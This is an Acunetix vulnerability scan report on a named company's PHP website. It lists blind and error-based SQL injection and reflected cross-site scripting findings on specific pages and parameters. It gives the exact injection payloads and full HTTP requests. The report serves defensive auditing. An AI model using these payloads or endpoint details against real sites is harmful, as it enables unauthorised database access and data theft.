Documente Academic
Documente Profesional
Documente Cultură
1 June, 2016
Developer Report
Scan of
http://www.asiatruongphat.com/baobitruongphat.com/index.php
Scan details
Scan information
Start time
Finish time
Scan time
Profile
Server information
Responsive
Server banner
Server OS
Server technologies
5/19/2016 10:36:52 PM
The scan was aborted
10 minutes, 47 seconds
Default
True
nginx
Unknown
PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.
Alerts distribution
Total alerts found
High
27
17
Medium
Low
Informational
Alerts summary
Blind SQL Injection
Classification
Base Score: 6.8
CVSS
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE-89
CWE
Affected items
/baobitruongphat.com/intro.php
/baobitruongphat.com/news.php
/baobitruongphat.com/newview.php
/baobitruongphat.com/sanpham.php
Variation
s1
1
2
2
Variation
s1
1
2
2
SQL injection
Classification
Base Score: 6.8
CVSS
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE-89
CWE
Affected items
/baobitruongphat.com/intro.php
/baobitruongphat.com/newview.php
Variation
s1
1
Variation
s1
2
Variation
s1
1
1
2
Variation
s1
Variation
s1
Variation
s1
4
Variation
s1
Broken links
Classification
Base Score: 0.0
CVSS
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: None
CWE-16
CWE
Affected items
/baobitruongphat.com/sitemap.php
Variation
s1
Alert details
Blind SQL Injection
Severity
High
Type
Validation
Reported by module Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
VIDEO: SQL Injection tutorial
Acunetix SQL Injection Attack
OWASP PHP Top 5
OWASP Injection Flaws
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>
6.953 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => ...
(line truncated)
Request headers
GET
/baobitruongphat.com/intro.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3d
sysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Acunetix Website Audit
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 598=598
Tests performed:
- 0+0+0+3 => TRUE
- 0+598*593+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 598=598 => TRUE
- 3 AND 3+1-1-1=1 AND 598=598 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/news.php?id=3%20AND%203*2*1%3d6%20AND%20598%3d598 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 903=903
Tests performed:
- 0+0+0+3 => TRUE
- 0+903*898+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 903=903 => TRUE
- 3 AND 3+1-1-1=1 AND 903=903 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3%20AND%203*2*1%3d6%20AND%20903%3d903&mt=81
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79 AND 3*2*1=6 AND 73=73
Tests performed:
- 0+0+0+79 => TRUE
- 0+73*68+79 => FALSE
- 89-5-2-999 => FALSE
- 89-5-2-3 => TRUE
- 89-2*5+0+0+1-1 => TRUE
- 89-2*6+0+0+1-1 => FALSE
- 79 AND 2+1-1-1=1 AND 73=73 => TRUE
- 79 AND 3+1-1-1=1 AND 73=73 => FALSE[/bol ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79%20AND%203*2*1%3d6%20AND%2073%3d73
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42 AND 3*2*1=6 AND 415=415
Tests performed:
- 0+0+0+42 => TRUE
- 0+415*410+42 => FALSE
- 52-5-2-999 => FALSE
- 52-5-2-3 => TRUE
- 52-2*5+0+0+1-1 => TRUE
- 52-2*6+0+0+1-1 => FALSE
- 42 AND 2+1-1-1=1 AND 415=415 => TRUE
- 42 AND 3+1-1-1=1 AND 415=415 => FA ... (line truncated)
Request headers
POST /baobitruongphat.com/sanpham.php?id=42%20AND%203*2*1%3d6%20AND%20415%3d415 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43 AND 3*2*1=6 AND 751=751
Tests performed:
- 0+0+0+43 => TRUE
- 0+751*746+43 => FALSE
- 53-5-2-999 => FALSE
- 53-5-2-3 => TRUE
- 53-2*5+0+0+1-1 => TRUE
- 53-2*6+0+0+1-1 => FALSE
- 43 AND 2+1-1-1=1 AND 751=751 => TRUE
- 43 AND 3+1-1-1=1 AND 751=751 => FA ... (line truncated)
Request headers
GET /baobitruongphat.com/sanpham.php?id=43%20AND%203*2*1%3d6%20AND%20751%3d751 HTTP/1.1
X-Requested-With: XMLHttpRequest
Acunetix Website Audit
8
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
10
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3'"()&%<acx><ScRiPt >prompt(935239)</ScRiPt>
Request headers
GET
/baobitruongphat.com/newview.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(935239)</ScRiPt>
&mt=81 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79'"()&%<acx><ScRiPt >prompt(994796)</ScRiPt>
Request headers
GET
/baobitruongphat.com/newview.php?id=3&mt=79'%22()%26%25<acx><ScRiPt%20>prompt(994796)</S
cRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42'"()&%<acx><ScRiPt >prompt(946739)</ScRiPt>
Request headers
POST
/baobitruongphat.com/sanpham.php?id=42'%22()%26%25<acx><ScRiPt%20>prompt(946739)</ScRiPt
> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43'"()&%<acx><ScRiPt >prompt(977060)</ScRiPt>
Request headers
GET
/baobitruongphat.com/sanpham.php?id=43'%22()%26%25<acx><ScRiPt%20>prompt(977060)</ScRiPt
> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Acunetix Website Audit
11
Accept: */*
12
SQL injection
Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/intro.php?id=1'%22 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
Acunetix Website Audit
13
14
15
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(49),CHAR(117),CHAR(84),CHAR(48),CHAR
(81),CHAR(80),CHAR(106)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuL1uT0QPj
Request headers
POST
/baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2c
concat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(76)%2cCHAR(49)%2cCHAR(117)%2cCHAR(8
4)%2cCHAR(48)%2cCHAR(81)%2cCHAR(80)%2cCHAR(106))%2cfloor(rand()*2))x%20from%20(select%20
1%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(89),CHAR(104),CHAR(51),CHAR(112),CHAR(51),CHA
R(84),CHAR(114),CHAR(82)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuYh3p3TrR
Request headers
GET
/baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2c
concat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(89)%2cCHAR(104)%2cCHAR(51)%2cCHAR(1
12)%2cCHAR(51)%2cCHAR(84)%2cCHAR(114)%2cCHAR(82))%2cfloor(rand()*2))x%20from%20(select%2
01%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
16
17
18
19
20
21
22
Broken links
Severity
Informational
Type
Informational
Reported by module Crawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.
This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/baobitruongphat.com/sitemap.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /baobitruongphat.com/sitemap.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
23
Input type
HTTP Header
URL: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/news.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/contact.php
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/sitemap.php
Vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/newview.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
mt
Input type
URL encoded GET
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Acunetix Website Audit
Input type
URL encoded GET
24
Input scheme 2
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/SlideShow.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/images/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/truongphat.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/corpstyle.css
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/flv.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/upload/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
25